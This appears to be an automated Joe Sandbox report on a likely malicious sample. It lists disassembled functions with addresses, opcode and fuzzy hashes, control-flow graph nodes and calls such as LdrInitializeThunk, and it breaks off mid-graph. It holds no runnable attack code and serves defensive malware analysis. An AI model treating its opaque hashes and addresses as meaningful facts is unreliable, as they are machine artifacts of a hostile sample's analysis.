                                                                                    • Snapshot File: hcaresult_20_2_b410000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e14e6a913b1a6a9e72f6f38b0360b42c322ea230186d3f0b4370b7d510c566d3
                                                                                    • Instruction ID: 77d2eb84cde802a7e8e07358260442ff2224b1333e4b5500a963415b36bbd61f
                                                                                    • Opcode Fuzzy Hash: e14e6a913b1a6a9e72f6f38b0360b42c322ea230186d3f0b4370b7d510c566d3
                                                                                    • Instruction Fuzzy Hash: 8AD02B3970151497C3240A95F4442ABB796DFC8722704002FE409C7300CF6648424291
                                                                                    Function 0B410328 Relevance: .0, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1417791958.000000000B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b410000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 60fb2c56b83221cefaf158b24ff93d8bdb44640e89dfb2a95e534c9d6eb0949d
                                                                                    • Instruction ID: 4a148f283fe7b35ac05edffde2c4f1be6bc963bdd581498143d96021bd7b7990
                                                                                    • Opcode Fuzzy Hash: 60fb2c56b83221cefaf158b24ff93d8bdb44640e89dfb2a95e534c9d6eb0949d
                                                                                    • Instruction Fuzzy Hash: FBD0A73E705618D7C7251A9AF4486ABF79EEFCCB22705002FE50AC73008F679C4192A5

                                                                                    Execution Graph

                                                                                    Execution Coverage:0.1%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:5
                                                                                    Total number of Limit Nodes:1
                                                                                    execution_graph 62747 1072b60 LdrInitializeThunk 62750 1072c00 62752 1072c0a 62750->62752 62753 1072c11 62752->62753 62754 1072c1f LdrInitializeThunk 62752->62754

                                                                                    Executed Functions

                                                                                    Function 01072C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 1072c0a-1072c0f 1 1072c11-1072c18 0->1 2 1072c1f-1072c26 LdrInitializeThunk 0->2
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(0108FD4F,000000FF,00000024,01126634,00000004,00000000,?,-00000018,7D810F61,?,?,01048B12,?,?,?,?), ref: 01072C24
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: c329ef862b860c0c659ac488dbaf88d10d2132da151daf3d606c8577ea4a6198
                                                                                    • Instruction ID: 446487d67229ecc487d866bc883d8ac171b6cf5adfd04ebfc94703fd1c12cd68
                                                                                    • Opcode Fuzzy Hash: c329ef862b860c0c659ac488dbaf88d10d2132da151daf3d606c8577ea4a6198
                                                                                    • Instruction Fuzzy Hash: 84B09B71D055C9C5EA51F7644608717794577D0701F55C062D3830645F4738C1D1E275
                                                                                    Function 01072B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 4 1072b60-1072b6c LdrInitializeThunk
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(010A0DBD,?,?,?,?,01094302), ref: 01072B6A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: dd4879f82d8e843f93887dffb475c6168680bb0b675d58ebd6a032045c904885
                                                                                    • Instruction ID: 58879650d355b6d59d357ff4d7b5792933b769dad7af14abb615cee19b7074f5
                                                                                    • Opcode Fuzzy Hash: dd4879f82d8e843f93887dffb475c6168680bb0b675d58ebd6a032045c904885
                                                                                    • Instruction Fuzzy Hash: 8E90026120640003510571588454616900B97E0301B95C022E1814594DC52589916225
                                                                                    Function 01072DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 5 1072df0-1072dfc LdrInitializeThunk
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(010AE73E,0000005A,0110D040,00000020,00000000,0110D040,00000080,01094A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0107AE00), ref: 01072DFA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: be36176e50c3b405a85449898e7753b1768d78d1db2a2116767718d3daa21036
                                                                                    • Instruction ID: 7d6e8fd9f47296cea31b93bfd119529c7fb2b3234b17e96370494b70ec75361f
                                                                                    • Opcode Fuzzy Hash: be36176e50c3b405a85449898e7753b1768d78d1db2a2116767718d3daa21036
                                                                                    • Instruction Fuzzy Hash: 0290023120540413E11171588544707500A97D0341FD5C413A0C2455CDD6568A52A221
                                                                                    Function 010735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 6 10735c0-10735cc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 56acda82f4b0b926e6c667d31289533ed879c7c5b994a91fe0f0dc949f9f5cc4
                                                                                    • Instruction ID: 07e6fd9bf6632634a57b08414df19f3cd98165b5bf67dd39c59d438e32815151
                                                                                    • Opcode Fuzzy Hash: 56acda82f4b0b926e6c667d31289533ed879c7c5b994a91fe0f0dc949f9f5cc4
                                                                                    • Instruction Fuzzy Hash: CC90023160950402E10071588554706600697D0301FA5C412A0C2456CDC7958A5166A2
                                                                                    Function 0042E66E Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 7 42e66e-42e6b7 call 42eba3 9 42e6bc-42e6c3 7->9 10 42e6d2-42e6d7 9->10 11 42e731-42e736 10->11 12 42e6d9-42e6e2 10->12 13 42e6f1-42e6f6 12->13 14 42e6f8-42e700 13->14 15 42e709-42e72e 13->15 16 42e706 14->16 15->11 16->15
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1501924365.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_42e000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 7
                                                                                    • API String ID: 0-1790921346
                                                                                    • Opcode ID: 35c0472331bc836a28ffe18e3ceb8ce52f3963d034eae8e7de3df50895376e62
                                                                                    • Instruction ID: cc5f4c00b526531b2d6ea892c52030275cfed3beceb1a4a8e7848eeb2a4a9a5d
                                                                                    • Opcode Fuzzy Hash: 35c0472331bc836a28ffe18e3ceb8ce52f3963d034eae8e7de3df50895376e62
                                                                                    • Instruction Fuzzy Hash: E71103B1D1021C9AEB60EBA59C41FDDB6B49F08304F4486EAA50CF2241EB745B54CF59
                                                                                    Function 0042E673 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 19 42e673-42e6b0 20 42e6bc-42e6d7 19->20 21 42e6b7 call 42eba3 19->21 23 42e731-42e736 20->23 24 42e6d9-42e6f6 20->24 21->20 26 42e6f8-42e700 24->26 27 42e709-42e72e 24->27 28 42e706 26->28 27->23 28->27
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1501924365.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_42e000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 7
                                                                                    • API String ID: 0-1790921346
                                                                                    • Opcode ID: e55fad14fc7f3018d0ccdd0179df70b6800531c4d1e73adc82dcbd939ccc2e56
                                                                                    • Instruction ID: aeb7108a66a03e4f16c0801649bb66297010c4efd1575f8cefc26ce58c751e98
                                                                                    • Opcode Fuzzy Hash: e55fad14fc7f3018d0ccdd0179df70b6800531c4d1e73adc82dcbd939ccc2e56
                                                                                    • Instruction Fuzzy Hash: F71112B1D1022C9AEB60EBA59C81FDDB7B89B08304F4486EA950CF2241FB745B54CF69
                                                                                    Function 0042EA74 Relevance: .0, Instructions: 33COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 31 42ea74-42ea80 32 42ea83-42eaab 31->32 33 42eab1-42eac2 32->33
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1501924365.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_42e000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6cb78329dcf4b9b39d95253f4088f01b96c5dbe9ccf2f46c81b946819ba498ad
                                                                                    • Instruction ID: 2c22d35e3ec6202f00ec1e7601048481733a4c0cef13d9316e1113bdb273f745
                                                                                    • Opcode Fuzzy Hash: 6cb78329dcf4b9b39d95253f4088f01b96c5dbe9ccf2f46c81b946819ba498ad
                                                                                    • Instruction Fuzzy Hash: DFF01D71610249AFCB04CF65D881EDAB7A9FF48750F44C219FD188B641D774F510CBA0
                                                                                    Function 0042EBD9 Relevance: .0, Instructions: 28COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 36 42ebd9-42ebf8 37 42ebfe-42ec05 36->37 38 42ec07-42ec09 37->38 39 42ec19-42ec1c 37->39 38->39 40 42ec0b-42ec17 call 42eba3 38->40 40->39
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1501924365.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_42e000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b789c4b77e8d625e455ec7da4014869dac3e6f28b0031a3c5e98841541b7d097
                                                                                    • Instruction ID: 4e477b9291399ee4fa54d52cc7128c14bd1051cbe746cfb2af746729ae629333
                                                                                    • Opcode Fuzzy Hash: b789c4b77e8d625e455ec7da4014869dac3e6f28b0031a3c5e98841541b7d097
                                                                                    • Instruction Fuzzy Hash: F5E0923674013067D224969BBD06F9BB769CFC5B64F45012AFA0CAF300D679A94182E8
                                                                                    Function 0042EBE3 Relevance: .0, Instructions: 28COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 43 42ebe3-42ebf8 44 42ebfe-42ec05 43->44 45 42ec07-42ec09 44->45 46 42ec19-42ec1c 44->46 45->46 47 42ec0b-42ec17 call 42eba3 45->47 47->46
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1501924365.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_42e000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e60cb7d3f0c613258d98b06d04eb9e234b025b9bfc7fd101d605e74c62703551
                                                                                    • Instruction ID: ab09885700ff2295b831fa202e34530ee4bc5756ccb4f6bce278b389399df640
                                                                                    • Opcode Fuzzy Hash: e60cb7d3f0c613258d98b06d04eb9e234b025b9bfc7fd101d605e74c62703551
                                                                                    • Instruction Fuzzy Hash: ADE04F36B0022427D624568BAC06FAB775C8BC1F64F45007AFF089B341E5AAB94042E8
                                                                                    Function 0042EA83 Relevance: .0, Instructions: 28COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 34 42ea83-42eaab 35 42eab1-42eac2 34->35
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1501924365.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_42e000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 76f9412881cc483d7444044b4663303154a551c15abac0575d8caa21bae148dc
                                                                                    • Instruction ID: b3225e471a334d12d6b4e2e0b2e988b0112f5ce8ff5ea0de0dc774f1f96fa678
                                                                                    • Opcode Fuzzy Hash: 76f9412881cc483d7444044b4663303154a551c15abac0575d8caa21bae148dc
                                                                                    • Instruction Fuzzy Hash: 94F0ACB6610209AFDB04CF59D881EDB77A9EB88760F04C619FD198B241D774FA10CBA0
                                                                                    Function 0042EB01 Relevance: .0, Instructions: 14COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 50 42eb01-42eb16 51 42eb1c-42eb20 50->51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1501924365.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_42e000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 27fe8dd7ff64c6864b55a675b012a2f9a159db4f608b718855abb04f4579ed9b
                                                                                    • Instruction ID: 43b74294e33dc70a61e556a37c7a73b8cd96ed5e74a6e6ca916f427e9e95b809
                                                                                    • Opcode Fuzzy Hash: 27fe8dd7ff64c6864b55a675b012a2f9a159db4f608b718855abb04f4579ed9b
                                                                                    • Instruction Fuzzy Hash: C5D01275600204BFDB50DBA8D886FE93B6CDB18350F004065B90CDB281E571B550CB14
                                                                                    Function 0042EB03 Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 52 42eb03-42eb16 53 42eb1c-42eb20 52->53
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1501924365.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_42e000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: be1a69f92bacebee83dc76a8e5915979dfc30708ddf466f9b31faffeeecea4b3
                                                                                    • Instruction ID: 6007c0202d4c02c32fd29c269217da7855efd4c830add205a4cceb19adf9aa07
                                                                                    • Opcode Fuzzy Hash: be1a69f92bacebee83dc76a8e5915979dfc30708ddf466f9b31faffeeecea4b3
                                                                                    • Instruction Fuzzy Hash: 20C080756103087FD740DB8CDC46F6533DC9708710F404065B90C8F341E570F9504758

                                                                                    Non-executed Functions

                                                                                    Function 01074A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51timeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 54 1074a80-1074a8b 55 1074a9f-1074aa6 54->55 56 1074a8d-1074a99 RtlDebugPrintTimes 54->56 57 1074aaf-1074ab6 call 105f5a0 55->57 58 1074aa8-1074aae 55->58 56->55 61 1074b25-1074b26 56->61 63 1074b23 57->63 64 1074ab8-1074b22 call 1061e46 * 2 57->64 63->61 64->63
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: 0Ivw$0Ivw$0Ivw$0Ivw$0Ivw$0Ivw
                                                                                    • API String ID: 3446177414-4119021165
                                                                                    • Opcode ID: a09c6f9c536a2ed86b4351042bb652fb47b1e5219c6e7c7188bd5208e3b74bb7
                                                                                    • Instruction ID: 976541080c61cab5b535f03f7cbac9f3e289d512b506b7852afa4c5c51d76846
                                                                                    • Opcode Fuzzy Hash: a09c6f9c536a2ed86b4351042bb652fb47b1e5219c6e7c7188bd5208e3b74bb7
                                                                                    • Instruction Fuzzy Hash: B701D232E0027C7AE77C9E2D79047862AD5B384738F15406AE958DF284D7644CE1C398
                                                                                    Function 01072890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 265 1072890-10728b3 266 10aa4bc-10aa4c0 265->266 267 10728b9-10728cc 265->267 266->267 268 10aa4c6-10aa4ca 266->268 269 10728ce-10728d7 267->269 270 10728dd-10728df 267->270 268->267 271 10aa4d0-10aa4d4 268->271 269->270 272 10aa57e-10aa585 269->272 273 10728e1-10728e5 270->273 271->267 274 10aa4da-10aa4de 271->274 272->270 275 10728eb-10728fa 273->275 276 1072988-107298e 273->276 274->267 280 10aa4e4-10aa4eb 274->280 277 10aa58a-10aa58d 275->277 278 1072900-1072905 275->278 279 1072908-107290c 276->279 277->279 278->279 279->273 281 107290e-107291b 279->281 282 10aa4ed-10aa4f4 280->282 283 10aa564-10aa56c 280->283 284 1072921 281->284 285 10aa592-10aa599 281->285 287 10aa50b 282->287 288 10aa4f6-10aa4fe 282->288 283->267 286 10aa572-10aa576 283->286 289 1072924-1072926 284->289 297 10aa5a1-10aa5c9 call 1080050 285->297 286->267 290 10aa57c call 1080050 286->290 292 10aa510-10aa536 call 1080050 287->292 288->267 291 10aa504-10aa509 288->291 294 1072993-1072995 289->294 295 1072928-107292a 289->295 304 10aa55d-10aa55f 290->304 291->292 292->304 294->295 299 1072997-10729b1 call 1080050 294->299 301 1072946-1072966 call 1080050 295->301 302 107292c-107292e 295->302 314 1072969-1072974 299->314 301->314 302->301 307 1072930-1072944 call 1080050 302->307 311 1072981-1072985 304->311 307->301 314->289 316 1072976-1072979 314->316 316->297 317 107297f 316->317 317->311
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID:
                                                                                    • API String ID: 48624451-0
                                                                                    • Opcode ID: cefc27cb09e7ce511fd58ccb92d244368324b1c50c3305082cca3bf8b87296ec
                                                                                    • Instruction ID: 80799e980b4904b8a7f4fd64c7864fb1c463894eb5d21dcf7ae121f53fd5fbfc
                                                                                    • Opcode Fuzzy Hash: cefc27cb09e7ce511fd58ccb92d244368324b1c50c3305082cca3bf8b87296ec
                                                                                    • Instruction Fuzzy Hash: 8F51D5B1E04156BEDB61DBAC889097EFBF8BB08240B548269F4D5D7681D334DE40CBA4
                                                                                    Function 0104A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 318 104a250-104a26f 319 104a275-104a291 318->319 320 104a58d-104a594 318->320 322 104a297-104a2a0 319->322 323 10979e6-10979eb 319->323 320->319 321 104a59a-10979bb 320->321 321->319 328 10979c1-10979c6 321->328 322->323 325 104a2a6-104a2ac 322->325 326 104a2b2-104a2b4 325->326 327 104a6ba-104a6bc 325->327 326->323 330 104a2ba-104a2bd 326->330 329 104a6c2 327->329 327->330 331 104a473-104a479 328->331 332 104a2c3-104a2c6 329->332 330->323 330->332 333 104a2c8-104a2d1 332->333 334 104a2da-104a2dd 332->334 335 10979cb-10979d5 333->335 336 104a2d7 333->336 337 104a6c7-104a6d0 334->337 338 104a2e3-104a32b 334->338 340 10979da-10979e3 call 10bf290 335->340 336->334 337->338 339 104a6d6-10979ff 337->339 341 104a330-104a335 338->341 339->340 340->323 344 104a47c-104a47f 341->344 345 104a33b-104a343 341->345 346 104a485-104a488 344->346 347 104a34f-104a35d 344->347 345->347 349 104a345-104a349 345->349 350 104a48e-104a49e 346->350 351 1097a16-1097a19 346->351 347->350 353 104a363-104a368 347->353 349->347 352 104a59f-104a5a8 349->352 350->351 356 104a4a4-104a4ad 350->356 354 1097a1f-1097a24 351->354 355 104a36c-104a36e 351->355 357 104a5c0-104a5c3 352->357 358 104a5aa-104a5ac 352->358 353->355 359 1097a2b 354->359 363 104a374-104a38c call 104a6e0 355->363 364 1097a26 355->364 356->355 361 1097a01 357->361 362 104a5c9-104a5cc 357->362 358->347 360 104a5b2-104a5bb 358->360 365 1097a2d-1097a2f 359->365 360->355 366 1097a0c 361->366 362->366 367 104a5d2-104a5d5 362->367 371 104a4b2-104a4b9 363->371 372 104a392-104a3ba 363->372 364->359 365->331 369 1097a35 365->369 366->351 367->358 373 104a3bc-104a3be 371->373 374 104a4bf-104a4c2 371->374 372->373 373->365 375 104a3c4-104a3cb 373->375 374->373 376 104a4c8-104a4d3 374->376 377 104a3d1-104a3d4 375->377 378 1097ae0 375->378 376->341 379 104a3e0-104a3ea 377->379 380 1097ae4-1097afc call 10bf290 378->380 379->380 381 104a3f0-104a40c call 104a840 379->381 380->331 386 104a5d7-104a5e0 381->386 387 104a412-104a417 381->387 389 104a601-104a603 386->389 390 104a5e2-104a5eb 386->390 387->331 388 104a419-104a43d 387->388 393 104a440-104a443 388->393 391 104a605-104a623 call 1034508 389->391 392 104a629-104a631 389->392 390->389 394 104a5ed-104a5f1 390->394 391->331 391->392 398 104a4d8-104a4dc 393->398 399 104a449-104a44c 393->399 395 104a5f7-104a5fb 394->395 396 104a681-104a6ab RtlDebugPrintTimes 394->396 395->389 395->396 396->389 417 104a6b1-104a6b5 396->417 401 1097a3a-1097a42 398->401 402 104a4e2-104a4e5 398->402 403 104a452-104a454 399->403 404 1097ad6 399->404 405 104a634-104a64a 401->405 406 1097a48-1097a4c 401->406 402->405 407 104a4eb-104a4ee 402->407 409 104a520-104a539 call 104a6e0 403->409 410 104a45a-104a461 403->410 404->378 413 104a4f4-104a50c 405->413 414 